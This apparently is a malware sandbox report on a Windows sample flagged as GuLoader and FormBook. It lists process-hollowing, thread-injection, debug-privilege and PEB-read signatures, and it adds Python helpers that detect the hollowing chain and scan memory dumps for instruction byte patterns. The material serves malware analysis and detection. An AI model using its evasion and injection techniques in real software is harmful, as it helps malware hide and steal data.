Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h] 36_2_1E171DB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h] 36_2_1E171DB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h] 36_2_1E171DB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1735A1 mov eax, dword ptr fs:[00000030h] 36_2_1E1735A1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1761A0 mov eax, dword ptr fs:[00000030h] 36_2_1E1761A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1761A0 mov eax, dword ptr fs:[00000030h] 36_2_1E1761A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C69A6 mov eax, dword ptr fs:[00000030h] 36_2_1E1C69A6
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1F8DF1 mov eax, dword ptr fs:[00000030h] 36_2_1E1F8DF1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h] 36_2_1E14B1E1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h] 36_2_1E14B1E1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h] 36_2_1E14B1E1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1D41E8 mov eax, dword ptr fs:[00000030h] 36_2_1E1D41E8
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15D5E0 mov eax, dword ptr fs:[00000030h] 36_2_1E15D5E0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15D5E0 mov eax, dword ptr fs:[00000030h] 36_2_1E15D5E0
Enables debug privileges
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread register set: target process: 3388
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
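The three evasion signatures above (a copy of the sample started as a child, memory mapped into another process as execute+read+write, and a thread context rewritten in another process) are the individual steps of one process-hollowing / thread-hijack sequence. The following helper is an added example, not Joe Sandbox code: it parses the plain-text "Source: <path> <event>: <detail>" lines this report uses and combines the three indicators into a single verdict. The input is constructed from the lines printed above; the PID 3388 and the paths are the ones the report shows.

```python
"""Triage helper for Joe Sandbox style behaviour lines (added example).

Parses 'Source: <path> <event>: <detail>' lines and checks for the
hollowing chain: self-spawned child + RWX section mapped into another
process + thread context (register set) modified in another process.
"""
import re

# Constructed from the report lines in this section.
REPORT_LINES = r"""
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread register set: target process: 3388
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
"""

# The source path is the process that performed the action; the detail
# part is event specific and parsed by the helpers below.
EVENT_RE = re.compile(
    r"^Source: (?P<source>\S+) "
    r"(?P<event>Section loaded|Thread register set|Process created): "
    r"(?P<detail>.*)$"
)
TARGET_PID_RE = re.compile(r"target process: (?P<pid>\d+)")
PROTECTION_RE = re.compile(r"protection: (?P<prot>.+)$")


def parse_report(text):
    """Return a list of dicts {signature, source, event, detail}.

    A line that is not a 'Source:' line is treated as the signature
    heading for the 'Source:' lines that follow it.
    """
    events, signature = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = EVENT_RE.match(line)
        if m is None:
            signature = line
            continue
        events.append({"signature": signature, **m.groupdict()})
    return events


def rwx_mappings(events):
    """Section mappings whose protection is execute, read and write."""
    hits = []
    for ev in events:
        if ev["event"] != "Section loaded":
            continue
        m = PROTECTION_RE.search(ev["detail"])
        if m and m.group("prot") == "execute and read and write":
            hits.append(ev)
    return hits


def thread_context_targets(events):
    """PIDs whose thread registers were rewritten by another process."""
    pids = set()
    for ev in events:
        if ev["event"] == "Thread register set":
            m = TARGET_PID_RE.search(ev["detail"])
            if m:
                pids.add(int(m.group("pid")))
    return pids


def self_spawns(events):
    """'Process created' events whose image path equals the creating process."""
    out = []
    for ev in events:
        if ev["event"] != "Process created":
            continue
        image = ev["detail"].split(" '", 1)[0]
        if image.lower() == ev["source"].lower():
            out.append(ev)
    return out


def assess_hollowing(events):
    """Combine the three indicators into one verdict dict."""
    rwx = rwx_mappings(events)
    targets = thread_context_targets(events)
    spawns = self_spawns(events)
    return {
        "rwx_mappings": len(rwx),
        "thread_context_targets": sorted(targets),
        "self_spawns": len(spawns),
        "hollowing_chain": bool(rwx) and bool(targets) and bool(spawns),
    }


if __name__ == "__main__":
    for key, value in assess_hollowing(parse_report(REPORT_LINES)).items():
        print(f"{key}: {value}")
```

The verdict is only as good as the report's own attribution: the section mappings are logged with "unknown target", so the helper does not try to prove that the RWX mapping went into PID 3388, it only reports that all three steps were observed from the same source image.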

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242183 cpuid 1_2_02242183
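The long list of fs:[00000030h] reads above and the cpuid hit in this section are both reported at the instruction level, so the same check can be repeated on a memory dump without the sandbox. The scanner below is an added example, not Joe Sandbox code: it searches a dumped code region for the machine-code encodings of those instructions and rebases the hits to the region's load address so they line up with the report's function addresses. The x64 PEB read (gs:[60h]) is included as an assumption so the table also covers 64-bit dumps, and the sample blob is constructed here, not taken from the malware.

```python
"""Byte-pattern scanner for PEB reads and cpuid (added example)."""

# (machine code, mnemonic as the report prints it)
PATTERNS = [
    (b"\x64\xa1\x30\x00\x00\x00", "mov eax, dword ptr fs:[00000030h]"),       # moffs32 form
    (b"\x64\x8b\x05\x30\x00\x00\x00", "mov eax, dword ptr fs:[00000030h]"),   # ModRM disp32 form
    (b"\x64\x8b\x0d\x30\x00\x00\x00", "mov ecx, dword ptr fs:[00000030h]"),
    (b"\x65\x48\x8b\x04\x25\x60\x00\x00\x00", "mov rax, qword ptr gs:[60h]"),  # x64 PEB read (assumed extension)
    (b"\x0f\xa2", "cpuid"),
]

# Constructed test input: a small 32-bit routine that reads the PEB twice
# (once to reach PEB->Ldr at +0Ch) and then executes cpuid.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                    # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"        # mov eax, fs:[30h]     (offset 3)
    b"\x8b\x40\x0c"                    # mov eax, [eax+0Ch]    (PEB->Ldr)
    b"\x64\x8b\x0d\x30\x00\x00\x00"    # mov ecx, fs:[30h]     (offset 12)
    b"\x31\xc0"                        # xor eax, eax
    b"\x0f\xa2"                        # cpuid                 (offset 21)
    b"\x5d\xc3"                        # pop ebp; ret
)


def scan(blob, base=0):
    """Return [(address, mnemonic)] for every pattern hit, sorted by address.

    base is the virtual address the blob was dumped from, so the addresses
    can be compared with the report's '36_2_1E...' function addresses.
    """
    hits = []
    for pattern, mnemonic in PATTERNS:
        start = 0
        while True:
            idx = blob.find(pattern, start)
            if idx < 0:
                break
            hits.append((base + idx, mnemonic))
            start = idx + 1
    return sorted(hits)


def summarize(hits):
    """Count hits per mnemonic, the way the report repeats them per function."""
    counts = {}
    for _, mnemonic in hits:
        counts[mnemonic] = counts.get(mnemonic, 0) + 1
    return counts


if __name__ == "__main__":
    for addr, mnemonic in scan(SAMPLE_CODE, base=0x1E210000):
        print(f"{addr:08X}  {mnemonic}")
    print(summarize(scan(SAMPLE_CODE)))
```

Raw byte matching is a triage aid, not proof: the same bytes can occur inside data or as the tail of a longer instruction, so confirm hits in a disassembler. Note also that the report attributes these hits to process 36 at addresses around 1E14xxxx to 1E21xxxx, so the region to dump and scan is that second-stage process's code, not the file on disk.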

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: ZGNX11JMSc.exe PID: 5880, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY